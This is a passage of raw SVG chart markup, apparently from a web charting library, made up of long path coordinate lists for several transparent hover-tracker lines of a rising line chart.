236.62267626666662 L 126.15441176470588 236.62267626666662 L 127.68244485294119 236.62267626666662 L 129.21047794117646 236.62267626666662 L 130.73851102941177 236.62267626666662 L 132.26654411764707 236.62267626666662 L 133.79457720588235 236.62267626666662 L 135.32261029411765 236.62267626666662 L 136.85064338235296 236.62267626666662 L 138.37867647058823 236.62267626666662 L 139.90670955882354 236.62267626666662 L 141.43474264705884 236.62267626666662 L 142.96277573529412 236.62267626666662 L 144.49080882352942 236.62267626666662 L 146.01884191176472 236.62267626666662 L 147.546875 236.62267626666662 L 149.0749080882353 236.62267626666662 L 150.6029411764706 236.62267626666662 L 152.13097426470588 236.62267626666662 L 153.6590073529412 236.62267626666662 L 155.18704044117646 236.62267626666662 L 156.71507352941177 236.62267626666662 L 158.24310661764707 236.62267626666662 L 159.77113970588235 236.53867146666664 L 161.29917279411765 236.501202208 L 162.82720588235296 236.47307036799998 L 164.35523897058823 236.47307036799998 L 165.88327205882354 236.296322848 L 167.41130514705884 235.330569568 L 168.93933823529412 234.542878048 L 170.46737132352942 232.607322208 L 171.99540441176472 223.29735260799998 L 173.5234375 214.328197408 L 175.0514705882353 207.661803808 L 176.5795036764706 201.162709408 L 178.10753676470588 196.42505180799998 L 179.6355698529412 190.607763808 L 181.1636029411765 183.028861408 L 182.69163602941177 178.910672608 L 184.21966911764707 177.936799456 L 185.74770220588235 177.936799456 L 187.27573529411765 177.89718834133325 L 188.80376838235296 177.23994994133324 L 190.33180147058823 177.23994994133324 L 191.85983455882354 176.7622087040001 L 193.38786764705884 176.659486048 L 194.91590073529412 175.380659488 L 196.44393382352942 175.05897852799976 L 197.97196691176472 175.05897852799976 L 199.5 175.05897852799976 L 201.0280330882353 175.05897852799976 L 202.5560661764706 174.9770986133331 L 204.08409926470588 174.32841106133316 L 205.6121323529412 173.80979774933314 L 207.1401654411765 173.67152075733324 L 208.66819852941177 173.67152075733324 L 210.19623161764707 173.67152075733324 L 211.72426470588235 173.67152075733324 L 213.25229779411765 173.67152075733324 L 214.78033088235296 173.67152075733324 L 216.30836397058823 173.67152075733324 L 217.83639705882354 173.67152075733324 L 219.36443014705884 173.67152075733324 L 220.89246323529412 173.67152075733324 L 222.42049632352942 173.67152075733324 L 223.94852941176472 173.67152075733324 L 225.4765625 173.67152075733324 L 227.0045955882353 173.65162955733325 L 228.5326286764706 172.40985035733326 L 230.06066176470588 172.00701803733327 L 231.5886948529412 170.01679691733327 L 233.1167279411765 168.07651691733327 L 234.64476102941177 165.57883931733326 L 236.17279411764707 164.35862628266688 L 237.70082720588238 163.47452953599964 L 239.22886029411765 161.62198393599965 L 240.75689338235296 159.92814169599964 L 242.28492647058823 158.88675567999965 L 243.81295955882354 157.720821941333 L 245.34099264705884 157.720821941333 L 246.86902573529412 157.720821941333 L 248.39705882352942 157.720821941333 L 249.92509191176472 157.720821941333 L 251.453125 157.720821941333 L 252.9811580882353 157.720821941333 L 254.5091911764706 156.32247058133302 L 256.0372242647059 154.99228210133302 L 257.56525735294116 153.73583314133302 L 259.09329044117646 153.09221074133302 L 260.62132352941177 152.45501035733304 L 262.1493566176471 151.87572414933265 L 263.6773897058824 151.4342807999993 L 265.2054227941177 150.8807781653328 L 266.7334558823529 150.18465128533276 L 268.26148897058823 149.84793194666614 L 269.78952205882354 149.03587370666614 L 271.31755514705884 148.31781322666652 L 272.84558823529414 148.00865385599982 L 274.37362132352945 147.8584705599998 L 275.9016544117647 147.56978925866633 L 277.4296875 147.35941140266632 L 278.9577205882353 147.0931298026663 L 280.4857536764706 146.81150750933327 L 282.0137867647059 146.62345831466655 L 283.54181985294116 146.45029831466655 L 285.06985294117646 146.42543431466655 L 286.59788602941177 146.42543431466655 L 288.1259191176471 146.42543431466655 L 289.6539522058824 146.42543431466655 L 291.1819852941177 146.42543431466655 L 292.7100183823529 146.42543431466655 L 294.23805147058823 146.42543431466655 L 295.76608455882354 146.42543431466655 L 297.29411764705884 146.42543431466655 L 298.82215073529414 146.42543431466655 L 300.35018382352945 146.42543431466655 L 301.8782169117647 146.42543431466655 L 303.40625 146.42543431466655 L 304.9342830882353 146.3963473813333 L 306.4623161764706 146.3963473813333 L 307.9903492647059 146.3963473813333 L 309.51838235294116 146.3963473813333 L 311.04641544117646 146.3963473813333 L 312.57444852941177 146.3963473813333 L 314.1024816176471 146.3963473813333 L 315.6305147058824 146.3963473813333 L 317.1585477941177 146.3963473813333 L 318.6865808823529 146.3905292053333 L 320.21461397058823 146.3905292053333 L 321.74264705882354 146.3905292053333 L 323.27068014705884 146.3905292053333 L 324.79871323529414 146.3905292053333 L 326.32674632352945 146.3905292053333 L 327.8547794117647 146.3905292053333 L 329.3828125 146.3905292053333 L 330.9108455882353 146.3905292053333 L 332.4388786764706 146.3905292053333 L 333.9669117647059 146.3905292053333 L 335.4949448529412 146.3905292053333 L 337.02297794117646 146.3905292053333 L 338.55101102941177 146.3905292053333 L 340.0790441176471 146.3905292053333 L 341.6070772058824 146.3905292053333 L 343.1351102941177 146.3905292053333 L 344.6631433823529 146.3905292053333 L 346.19117647058823 146.3905292053333 L 347.71920955882354 146.3905292053333 L 349.24724264705884 146.34364280533327 L 350.77527573529414 145.8179112853333 L 352.30330882352945 145.2620943253333 L 353.8313419117647 144.8875892053333 L 355.359375 144.3563149866667 L 356.8874080882353 144.1452760639999 L 358.4154411764706 143.66090166399988 L 359.9434742647059 143.5343794239999 L 361.4715073529412 143.32381686399987 L 362.99954044117646 142.67912886399986 L 364.52757352941177 142.22990387199988 L 366.0556066176471 141.66738705066638 L 367.5836397058824 140.2285630186664 L 369.1116727941177 138.73015181866637 L 370.6397058823529 137.82415501866637 L 372.16773897058823 136.16395021866634 L 373.69577205882354 133.70063821866637 L 375.22380514705884 131.54912077866635 L 376.75183823529414 130.62727021866638 L 378.27987132352945 129.24230989866638 L 379.8079044117647 128.87701156266638 L 381.3359375 128.87701156266638 L 382.8639705882353 128.87701156266638 L 384.3920036764706 128.87701156266638 L 385.9200367647059 128.63470596266635 L 387.4480698529412 128.24192580266637 L 388.97610294117646 127.82218596266637 L 390.50413602941177 127.66921908266636 L 392.0321691176471 127.53481613866634 L 393.5602022058824 127.16046730666633 L 395.0882352941177 127.08597002666636 L 405.0882352941177 127.08597002666636" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.1453664 L 173.5234375 236.1453664 L 175.0514705882353 235.4907328 L 176.5795036764706 235.1667904 L 178.10753676470588 233.5639504 L 179.6355698529412 233.5639504 L 181.1636029411765 233.5639504 L 182.69163602941177 233.5639504 L 184.21966911764707 233.5639504 L 185.74770220588235 233.5639504 L 187.27573529411765 233.38810666666663 L 188.80376838235296 233.38810666666663 L 190.33180147058823 233.38810666666663 L 191.85983455882354 233.15178815999988 L 193.38786764705884 232.9347609599999 L 194.91590073529412 231.64236575999988 L 196.44393382352942 230.31214175999986 L 197.97196691176472 229.48097375999987 L 199.5 227.44621055999988 L 201.0280330882353 225.4114473599999 L 202.5560661764706 223.03249535999987 L 204.08409926470588 222.02053055999988 L 205.6121323529412 220.98556655999988 L 207.1401654411765 219.45739749333126 L 208.66819852941177 217.82756229333123 L 210.19623161764707 215.85691269333122 L 211.72426470588235 215.85691269333122 L 213.25229779411765 215.85691269333122 L 214.78033088235296 215.48167941333122 L 216.30836397058823 215.09834757333124 L 217.83639705882354 214.33978245333122 L 219.36443014705884 213.59741445333123 L 220.89246323529412 212.84424837333123 L 222.42049632352942 212.60804037333125 L 223.94852941176472 211.58762181333122 L 225.4765625 211.20698949333124 L 227.0045955882353 210.18927045333123 L 228.5326286764706 209.80458885333124 L 230.06066176470588 209.30258469333126 L 231.5886948529412 207.74766117333124 L 233.1167279411765 206.15874501333124 L 234.64476102941177 205.34854802133123 L 236.17279411764707 205.16735813333145 L 237.70082720588238 205.02964472533148 L 239.22886029411765 204.46477016533146 L 240.75689338235296 203.8998956053315 L 242.28492647058823 203.47049432533146 L 243.81295955882354 203.06354168533147 L 245.34099264705884 202.56008120533147 L 246.86902573529412 202.08968984533146 L 248.39705882352942 201.73470296533148 L 249.92509191176472 201.50051960533148 L 251.453125 201.45725624533148 L 252.9811580882353 201.45725624533148 L 254.5091911764706 201.3452261653315 L 256.0372242647059 201.12926456533148 L 257.56525735294116 200.84918936533148 L 259.09329044117646 200.8280549653315 L 260.62132352941177 200.7895654933315 L 262.1493566176471 200.65630155733135 L 263.6773897058824 200.5634877973314 L 265.2054227941177 200.49081387733136 L 266.7334558823529 200.43003521066487 L 268.26148897058823 200.334869631998 L 269.78952205882354 200.221045791998 L 271.31755514705884 200.15947779199809 L 272.84558823529414 200.0627789333315 L 274.37362132352945 200.0275880853315 L 275.9016544117647 199.69264632533148 L 277.4296875 199.69264632533148 L 278.9577205882353 199.69264632533148 L 280.4857536764706 199.69264632533148 L 282.0137867647059 199.69264632533148 L 283.54181985294116 199.69264632533148 L 285.06985294117646 199.69264632533148 L 286.59788602941177 199.23710232533148 L 288.1259191176471 198.90978552533147 L 289.6539522058824 198.32938872533148 L 291.1819852941177 197.33912664533148 L 292.7100183823529 196.51810670933148 L 294.23805147058823 195.7426695893315 L 295.76608455882354 195.0981947093315 L 297.29411764705884 194.61054418133148 L 298.82215073529414 194.61054418133148 L 300.35018382352945 194.61054418133148 L 301.8782169117647 193.84808685866474 L 303.40625 192.72757254399812 L 304.9342830882353 192.31298310399814 L 306.4623161764706 191.8666375999981 L 307.9903492647059 191.21557889066452 L 309.51838235294116 191.03535317333126 L 311.04641544117646 189.70392149333125 L 312.57444852941177 188.68379301333124 L 314.1024816176471 186.29896600533124 L 315.6305147058824 184.60151848533127 L 317.1585477941177 182.09085832533128 L 318.6865808823529 181.34885973333127 L 320.21461397058823 180.45261909333124 L 321.74264705882354 179.64233685333124 L 323.27068014705884 178.83504539733127 L 324.79871323529414 177.7485312213309 L 326.32674632352945 176.9558846613309 L 327.8547794117647 175.6883428053309 L 329.3828125 174.62338216533092 L 330.9108455882353 173.07061352533088 L 332.4388786764706 171.78743221333093 L 333.9669117647059 170.78767997866427 L 335.4949448529412 170.0141396266643 L 337.02297794117646 168.63997738666427 L 338.55101102941177 167.44122079999752 L 340.0790441176471 166.65374003199753 L 341.6070772058824 165.75410723199752 L 343.1351102941177 165.33170339199754 L 344.6631433823529 165.33170339199754 L 346.19117647058823 165.04306787199752 L 347.71920955882354 164.73825299199754 L 349.24724264705884 164.00272614399753 L 350.77527573529414 163.79688774399753 L 352.30330882352945 163.79688774399753 L 353.8313419117647 163.79688774399753 L 355.359375 163.79688774399753 L 356.8874080882353 163.79688774399753 L 358.4154411764706 163.79688774399753 L 359.9434742647059 163.60221446399754 L 361.4715073529412 163.4567087573309 L 362.99954044117646 163.15658527999756 L 364.52757352941177 162.63092835199754 L 366.0556066176471 162.32943459199757 L 367.5836397058824 161.78606462933092 L 369.1116727941177 161.39250302933095 L 370.6397058823529 161.15966942933093 L 372.16773897058823 160.19757470933092 L 373.69577205882354 159.8962123733309 L 375.22380514705884 158.22240893866427 L 376.75183823529414 157.09466748799753 L 378.27987132352945 154.47904572799757 L 379.8079044117647 152.48935740799755 L 381.3359375 151.99776771199765 L 382.8639705882353 151.69312569599768 L 384.3920036764706 150.12692102399765 L 385.9200367647059 149.11445933866432 L 387.4480698529412 146.52967683199768 L 388.97610294117646 144.51849891199765 L 390.50413602941177 139.53462259199765 L 392.0321691176471 138.15426803199648 L 393.5602022058824 138.03481427199645 L 395.0882352941177 137.81540012799647 L 405.0882352941177 137.81540012799647" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 235.71889157333374 L 94.06571691176471 235.71889157333374 L 95.59375 235.71889157333374 L 97.1217830882353 235.71889157333374 L 98.6498161764706 235.71889157333374 L 100.17784926470588 235.71889157333374 L 101.70588235294119 235.71889157333374 L 103.23391544117648 235.71889157333374 L 104.76194852941177 235.71889157333374 L 106.28998161764706 235.71889157333374 L 107.81801470588236 235.71889157333374 L 109.34604779411765 235.71889157333374 L 110.87408088235294 235.71889157333374 L 112.40211397058825 235.71889157333374 L 113.93014705882354 235.71889157333374 L 115.45818014705883 235.71889157333374 L 116.98621323529413 235.71889157333374 L 118.51424632352942 235.71889157333374 L 120.04227941176471 235.71889157333374 L 121.5703125 235.71889157333374 L 123.0983455882353 235.71889157333374 L 124.6263786764706 235.71889157333374 L 126.15441176470588 235.71889157333374 L 127.68244485294119 235.71889157333374 L 129.21047794117646 235.71889157333374 L 130.73851102941177 235.71889157333374 L 132.26654411764707 235.71889157333374 L 133.79457720588235 235.71889157333374 L 135.32261029411765 235.71889157333374 L 136.85064338235296 235.71889157333374 L 138.37867647058823 235.71889157333374 L 139.90670955882354 235.71889157333374 L 141.43474264705884 235.71889157333374 L 142.96277573529412 235.71889157333374 L 144.49080882352942 235.71889157333374 L 146.01884191176472 235.71889157333374 L 147.546875 235.71889157333374 L 149.0749080882353 235.71889157333374 L 150.6029411764706 235.71889157333374 L 152.13097426470588 235.71889157333374 L 153.6590073529412 235.71889157333374 L 155.18704044117646 235.71889157333374 L 156.71507352941177 235.71889157333374 L 158.24310661764707 235.71889157333374 L 159.77113970588235 235.71889157333374 L 161.29917279411765 235.71889157333374 L 162.82720588235296 235.71889157333374 L 164.35523897058823 235.71889157333374 L 165.88327205882354 235.71889157333374 L 167.41130514705884 235.71889157333374 L 168.93933823529412 225.88482437333371 L 170.46737132352942 218.59612037333375 L 171.99540441176472 209.20516517333374 L 173.5234375 204.2245507733337 L 175.0514705882353 204.2245507733337 L 176.5795036764706 204.2245507733337 L 178.10753676470588 204.2245507733337 L 179.6355698529412 204.2245507733337 L 181.1636029411765 204.2245507733337 L 182.69163602941177 204.2245507733337 L 184.21966911764707 204.2245507733337 L 185.74770220588235 204.2245507733337 L 187.27573529411765 204.2245507733337 L 188.80376838235296 204.2245507733337 L 190.33180147058823 204.2245507733337 L 191.85983455882354 204.2245507733337 L 193.38786764705884 204.12039271466696 L 194.91590073529412 204.12039271466696 L 196.44393382352942 204.12039271466696 L 197.97196691176472 204.12039271466696 L 199.5 204.12039271466696 L 201.0280330882353 204.12039271466696 L 202.5560661764706 202.50390119466698 L 204.08409926470588 201.73298932266698 L 205.6121323529412 200.99941370666699 L 207.1401654411765 200.0549988693337 L 208.66819852941177 200.0549988693337 L 210.19623161764707 200.0549988693337 L 211.72426470588235 200.0549988693337 L 213.25229779411765 200.0549988693337 L 214.78033088235296 200.0549988693337 L 216.30836397058823 200.0549988693337 L 217.83639705882354 200.0549988693337 L 219.36443014705884 200.0549988693337 L 220.89246323529412 200.0549988693337 L 222.42049632352942 200.0549988693337 L 223.94852941176472 200.0549988693337 L 225.4765625 200.0549988693337 L 227.0045955882353 200.0549988693337 L 228.5326286764706 200.0549988693337 L 230.06066176470588 200.0549988693337 L 231.5886948529412 200.0549988693337 L 233.1167279411765 200.0549988693337 L 234.64476102941177 200.0549988693337 L 236.17279411764707 200.0549988693337 L 237.70082720588238 200.0549988693337 L 239.22886029411765 200.0549988693337 L 240.75689338235296 200.0549988693337 L 242.28492647058823 200.0549988693337 L 243.81295955882354 200.0549988693337 L 245.34099264705884 200.0549988693337 L 246.86902573529412 200.0549988693337 L 248.39705882352942 200.0549988693337 L 249.92509191176472 200.0549988693337 L 251.453125 200.0549988693337 L 252.9811580882353 200.0549988693337 L 254.5091911764706 200.0549988693337 L 256.0372242647059 200.0549988693337 L 257.56525735294116 200.0549988693337 L 259.09329044117646 200.0549988693337 L 260.62132352941177 200.0549988693337 L 262.1493566176471 200.0549988693337 L 263.6773897058824 200.0549988693337 L 265.2054227941177 200.0549988693337 L 266.7334558823529 200.0549988693337 L 268.26148897058823 200.0549988693337 L 269.78952205882354 200.0549988693337 L 271.31755514705884 200.0549988693337 L 272.84558823529414 200.0549988693337 L 274.37362132352945 200.0549988693337 L 275.9016544117647 200.0549988693337 L 277.4296875 200.04850936533373 L 278.9577205882353 200.04850936533373 L 280.4857536764706 200.04850936533373 L 282.0137867647059 200.04850936533373 L 283.54181985294116 200.04850936533373 L 285.06985294117646 200.04850936533373 L 286.59788602941177 200.04850936533373 L 288.1259191176471 200.04850936533373 L 289.6539522058824 200.04850936533373 L 291.1819852941177 200.04850936533373 L 292.7100183823529 200.04850936533373 L 294.23805147058823 200.04850936533373 L 295.76608455882354 200.04850936533373 L 297.29411764705884 200.04850936533373 L 298.82215073529414 200.04850936533373 L 300.35018382352945 200.04850936533373 L 301.8782169117647 200.04850936533373 L 303.40625 200.04850936533373 L 304.9342830882353 200.02203512533373 L 306.4623161764706 200.02203512533373 L 307.9903492647059 200.02203512533373 L 309.51838235294116 200.02203512533373 L 311.04641544117646 200.02203512533373 L 312.57444852941177 200.02203512533373 L 314.1024816176471 200.02203512533373 L 315.6305147058824 200.02203512533373 L 317.1585477941177 200.02203512533373 L 318.6865808823529 200.02203512533373 L 320.21461397058823 200.02203512533373 L 321.74264705882354 200.02203512533373 L 323.27068014705884 200.02203512533373 L 324.79871323529414 200.02203512533373 L 326.32674632352945 200.02203512533373 L 327.8547794117647 200.02203512533373 L 329.3828125 200.02203512533373 L 330.9108455882353 200.02203512533373 L 332.4388786764706 200.02203512533373 L 333.9669117647059 200.02203512533373 L 335.4949448529412 200.02203512533373 L 337.02297794117646 200.02203512533373 L 338.55101102941177 200.02203512533373 L 340.0790441176471 200.02203512533373 L 341.6070772058824 189.59691512533374 L 343.1351102941177 176.7312869653337 L 344.6631433823529 176.4515669653337 L 346.19117647058823 167.06533592533373 L 347.71920955882354 158.02734296533373 L 349.24724264705884 158.02734296533373 L 350.77527573529414 158.02734296533373 L 352.30330882352945 158.02734296533373 L 353.8313419117647 158.02734296533373 L 355.359375 158.00342379733374 L 356.8874080882353 158.00342379733374 L 358.4154411764706 158.00342379733374 L 359.9434742647059 158.00342379733374 L 361.4715073529412 158.00342379733374 L 362.99954044117646 158.00342379733374 L 364.52757352941177 158.00342379733374 L 366.0556066176471 158.00342379733374 L 367.5836397058824 158.00342379733374 L 369.1116727941177 157.93593579733374 L 370.6397058823529 157.93593579733374 L 372.16773897058823 154.4940477973337 L 373.69577205882354 146.7842186773337 L 375.22380514705884 143.32410891733372 L 376.75183823529414 143.32410891733372 L 378.27987132352945 143.32410891733372 L 379.8079044117647 143.32410891733372 L 381.3359375 143.32410891733372 L 382.8639705882353 143.32410891733372 L 384.3920036764706 143.32410891733372 L 385.9200367647059 143.32410891733372 L 387.4480698529412 143.32410891733372 L 388.97610294117646 143.32410891733372 L 390.50413602941177 142.3957660906671 L 392.0321691176471 138.82611659733573 L 393.5602022058824 138.82611659733573 L 395.0882352941177 138.82611659733573 L 405.0882352941177 138.82611659733573" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.192608 L 118.51424632352942 236.192608 L 120.04227941176471 236.192608 L 121.5703125 236.192608 L 123.0983455882353 236.192608 L 124.6263786764706 236.192608 L 126.15441176470588 236.192608 L 127.68244485294119 235.82870954666626 L 129.21047794117646 234.65441834666626 L 130.73851102941177 234.65441834666626 L 132.26654411764707 234.65441834666626 L 133.79457720588235 234.65441834666626 L 135.32261029411765 234.65441834666626 L 136.85064338235296 234.65441834666626 L 138.37867647058823 234.65441834666626 L 139.90670955882354 234.65441834666626 L 141.43474264705884 234.65441834666626 L 142.96277573529412 234.65441834666626 L 144.49080882352942 233.79288074666627 L 146.01884191176472 233.79288074666627 L 147.546875 233.79288074666627 L 149.0749080882353 233.79288074666627 L 150.6029411764706 233.79288074666627 L 152.13097426470588 233.79288074666627 L 153.6590073529412 233.79288074666627 L 155.18704044117646 233.79288074666627 L 156.71507352941177 233.79288074666627 L 158.24310661764707 233.79288074666627 L 159.77113970588235 233.79288074666627 L 161.29917279411765 233.79288074666627 L 162.82720588235296 233.79288074666627 L 164.35523897058823 233.79288074666627 L 165.88327205882354 232.36213514666628 L 167.41130514705884 232.36213514666628 L 168.93933823529412 232.36213514666628 L 170.46737132352942 232.36213514666628 L 171.99540441176472 232.36213514666628 L 173.5234375 232.36213514666628 L 175.0514705882353 232.36213514666628 L 176.5795036764706 232.36213514666628 L 178.10753676470588 232.36213514666628 L 179.6355698529412 232.36213514666628 L 181.1636029411765 232.36213514666628 L 182.69163602941177 232.36213514666628 L 184.21966911764707 232.36213514666628 L 185.74770220588235 232.36213514666628 L 187.27573529411765 232.36213514666628 L 188.80376838235296 232.36213514666628 L 190.33180147058823 232.36213514666628 L 191.85983455882354 232.36213514666628 L 193.38786764705884 232.36213514666628 L 194.91590073529412 232.36213514666628 L 196.44393382352942 232.12509834666628 L 197.97196691176472 232.12509834666628 L 199.5 232.12509834666628 L 201.0280330882353 232.12509834666628 L 202.5560661764706 232.12509834666628 L 204.08409926470588 232.12509834666628 L 205.6121323529412 232.12509834666628 L 207.1401654411765 232.12509834666628 L 208.66819852941177 232.12509834666628 L 210.19623161764707 231.96030133333255 L 211.72426470588235 231.96030133333255 L 213.25229779411765 231.96030133333255 L 214.78033088235296 231.96030133333255 L 216.30836397058823 231.96030133333255 L 217.83639705882354 231.96030133333255 L 219.36443014705884 231.96030133333255 L 220.89246323529412 231.96030133333255 L 222.42049632352942 231.96030133333255 L 223.94852941176472 231.29217013333255 L 225.4765625 231.29217013333255 L 227.0045955882353 231.29217013333255 L 228.5326286764706 231.29217013333255 L 230.06066176470588 231.29217013333255 L 231.5886948529412 231.29217013333255 L 233.1167279411765 231.29217013333255 L 234.64476102941177 231.29217013333255 L 236.17279411764707 231.29217013333255 L 237.70082720588238 231.29217013333255 L 239.22886029411765 231.29217013333255 L 240.75689338235296 231.29217013333255 L 242.28492647058823 231.29217013333255 L 243.81295955882354 231.29217013333255 L 245.34099264705884 231.29217013333255 L 246.86902573529412 231.29217013333255 L 248.39705882352942 231.29217013333255 L 249.92509191176472 231.29217013333255 L 251.453125 231.02204053333253 L 252.9811580882353 231.02204053333253 L 254.5091911764706 231.02204053333253 L 256.0372242647059 231.02204053333253 L 257.56525735294116 230.37344533333254 L 259.09329044117646 230.37344533333254 L 260.62132352941177 230.02435477333256 L 262.1493566176471 229.41483157333255 L 263.6773897058824 228.30106645333254 L 265.2054227941177 228.30106645333254 L 266.7334558823529 228.30106645333254 L 268.26148897058823 228.30106645333254 L 269.78952205882354 228.30106645333254 L 271.31755514705884 228.30106645333254 L 272.84558823529414 228.30106645333254 L 274.37362132352945 228.30106645333254 L 275.9016544117647 228.30106645333254 L 277.4296875 228.30106645333254 L 278.9577205882353 228.30106645333254 L 280.4857536764706 228.30106645333254 L 282.0137867647059 228.30106645333254 L 283.54181985294116 228.30106645333254 L 285.06985294117646 228.30106645333254 L 286.59788602941177 228.30106645333254 L 288.1259191176471 228.30106645333254 L 289.6539522058824 228.30106645333254 L 291.1819852941177 228.30106645333254 L 292.7100183823529 227.77359445333252 